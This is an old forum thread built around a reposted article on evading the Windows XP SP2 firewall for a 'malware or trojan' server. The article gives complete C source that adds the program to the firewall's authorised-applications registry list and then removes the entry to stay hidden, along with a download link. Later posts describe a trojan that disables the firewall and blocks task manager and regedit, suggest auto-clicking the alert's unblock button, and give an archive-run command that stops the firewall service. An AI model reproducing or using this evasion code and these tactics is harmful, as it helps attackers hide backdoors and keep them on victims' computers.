This article is about how to open up a listening port from Windows XP SP2 without being logged/listed as open:
Quote1.9.2005
Mark Kica
crusoe@alexandria.cc
FEI AI Technical University Kosice
#Dedicated to Katka H. from Levoca
How to avoid of detection of server application on Windows XP SP2 firewall
###############################################################################
#Q:How safe is Windows XP SP2 firewall ?
#A:Not very...
This trick use only modification of registry keys.Windows Xp SP2 firewall have
list of allowed program in register which are not blocked.If you add new key
to it,your server (malware or trojane) can run freely.
also server can be invisible in following list
start->control panel->windows firewall->exceptions
It will become invisible from this list because after you create socket,you can remove registry string value of your server and connection wont be aborted
Other way how to bypass SP2 firewall ,is to create trojan not as server,but
as client.
##################################################################
http://taekwondo-itf.szm.sk/bugg.zip
Test :
#c:\bugg.exe Server running on port 2001
connect to server with :
#telnet localhost 2001
##################################################################
Our Registry path is
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\AuthorizedApplications\List
and there you can create string value
Value name Value
C:\chat.exe ........ C:\chat.exe:*:Enabled:chat
NO SPACES!!! in key name etc. _C:\chat.exe___
#################################################################
Tested on Windows XP 2005 center media edition with integrated SP2
Source code
(server use ezsocket lib)
#include <stdio.h>
#include <windows.h>
#include <ezsocket.h>
#include <conio.h>
#include "Shlwapi.h"
int main( int argc, char *argv [] )
{
char buffer[1024];
char filename[1024];
HKEY hKey;
int i;
GetModuleFileName(NULL, filename, 1024);
strcpy(buffer, filename);
strcat(buffer, ":*:Enabled:");
strcat(buffer, "bugg");
RegOpenKeyEx(
HKEY_LOCAL_MACHINE,
"SYSTEM\\CurrentControlSet\\Services\\SharedAccess\\Parameters\\FirewallPolicy\\StandardProfile\\AuthorizedApplications\\List",
0,
KEY_ALL_ACCESS,
&hKey);
RegSetValueEx(hKey, filename, 0, REG_SZ, buffer, strlen(buffer));
int temp, sockfd, new_fd, fd_size;
struct sockaddr_in remote_addr;
fprintf(stdout, "Simple server example with Anti SP2 firewall trick \n");
fprintf(stdout, " This is not trojan \n");
fprintf(stdout, " Opened port is :2001 \n");
fprintf(stdout, "author:Mark Kica student of Technical University Kosice\n");
fprintf(stdout, "Dedicated to Katka H. from Levoca \n");
sleep(3);
if ((sockfd = ezsocket(NULL, NULL, 2001, SERVER)) == -1)
return 0;
for (; ; )
{
RegDeleteValue(hKey, filename);
fd_size = sizeof(struct sockaddr_in);
if ((new_fd = accept(sockfd, (struct sockaddr *)&remote_addr, &fd_size)) == -1)
{
perror("accept");
continue;
}
temp = send(new_fd, "Hello World\r\n", strlen("Hello World\r\n"), 0);
fprintf(stdout, "Sended: Hello World\r\n");
temp = recv(new_fd, buffer, 1024, 0);
buffer[temp] = '\0';
fprintf(stdout, "Recieved: %s\r\n", buffer);
ezclose_socket(new_fd);
RegSetValueEx(hKey, filename, 0, REG_SZ, buffer, strlen(buffer));
if (!strcmp(buffer, "quit"))
break;
}
ezsocket_exit();
return 0;
}
Thanks, was looking for some information on SP2's firewall recently.
Heh, I wouldn't trust the XP firewall anymore than my headphones, even before this.
i made a trojan, and to prevent the xp sp2 firewall from doing anything... i just blocked the window name "windows security alert" so it wont display that stupid mesasage. Along with that, when the trojan is installed, it disables the firewall, and adds itself to the allowed programs list (registry). The application blocker of my trojan i have set by default to block task manager, msconfig, regedit, and windows security alert. So, once its on, its not ez to get off :). And the user can add there own blocks if they want.
Uh, it will not display the message, but I'm guessing that it will still block access.
You should set a loop to detect for that window to pop up, and when it does, find the button that says "unblock" and unblock your program from accessing the internet.
Quote from: Koga73 on September 14, 2005, 10:32:51 PM
i made a trojan, and to prevent the xp sp2 firewall from doing anything... i just blocked the window name "windows security alert" so it wont display that stupid mesasage. Along with that, when the trojan is installed, it disables the firewall, and adds itself to the allowed programs list (registry). The application blocker of my trojan i have set by default to block task manager, msconfig, regedit, and windows security alert. So, once its on, its not ez to get off :). And the user can add there own blocks if they want.
How incredibly annoying. People who program maliciously suck at life.
when the window closes, it doenst block it, or permantly allow it. Just allows it that time, and next time itll ask u again.
Koga, waste your time on something better. The Windows firewall doesn't do anything even if you leave it alone.
Quote from: Joe[e2] on September 15, 2005, 10:48:06 PM
Koga, waste your time on something better. The Windows firewall doesn't do anything even if you leave it alone.
Seriously, other then not letting you host games on B.net it's really got no purpose.
It blocks incoming traffic. That will stop a lot of attacks, such as:
MS03-026 (Dcom -- Blaster worm)
MS04-011 (Lsass -- Sasser worm)
MS05-039 (PnP -- Zotob worm)
and many others.
It's useful for preventing incoming attcks, like worms, but isn't terribly useful for blocking outbound traffic.
Windows Vista is supposed to have its firewall upgraded so that it does
Quote from: Mangix on September 25, 2005, 08:28:15 PM
Windows Vista is supposed to have its firewall upgraded so that it does
It does what? A dance? Blocks Sasser? Damn, it better.
blocking outgoing connections and maybe will fix the issue where malware can disable it
Quote from: Mangix on September 25, 2005, 08:47:31 PM
blocking outgoing connections and maybe will fix the issue where malware can disable it
As long as the user can disable it without a password, so can viruses. And people don't like having to put in a password, so that probably won't change.
XP firewall is easily disabled w/ a archivirus (sfx scripting)
all you have to do is set it to run this before extraction:
C:\Windows\system32\net.exe stop alg
This command will shutdown the "Application Layer Gateway Service" which is responsibly for correct functionality of the firewall.
and requires administrative access.
Mhm, I'm not a fan of this anyways since it makes it somewhat obvious that the system is compromised, just an example.
Quote from: Mangix on September 25, 2005, 08:28:15 PM
Windows Vista is supposed to have its firewall upgraded so that it does
Isn't Vista just supposed to come with Windows One Care?
One Care is for live.com, Vista comes with Windows Defender (Formerly Windows Anti-Spyware Beta2)
Quote from: Warriorx86] link=topic=2729.msg56224#msg56224 date=1140372938]
One Care is for live.com, Vista comes with Windows Defender (Formerly Windows Anti-Spyware Beta2)
The "Anti-Spyware" that teamed up with Gator?
You mean bought out? Check Defender, it detects and removes it if it is even present. I really don't know why you even start with this *shrug*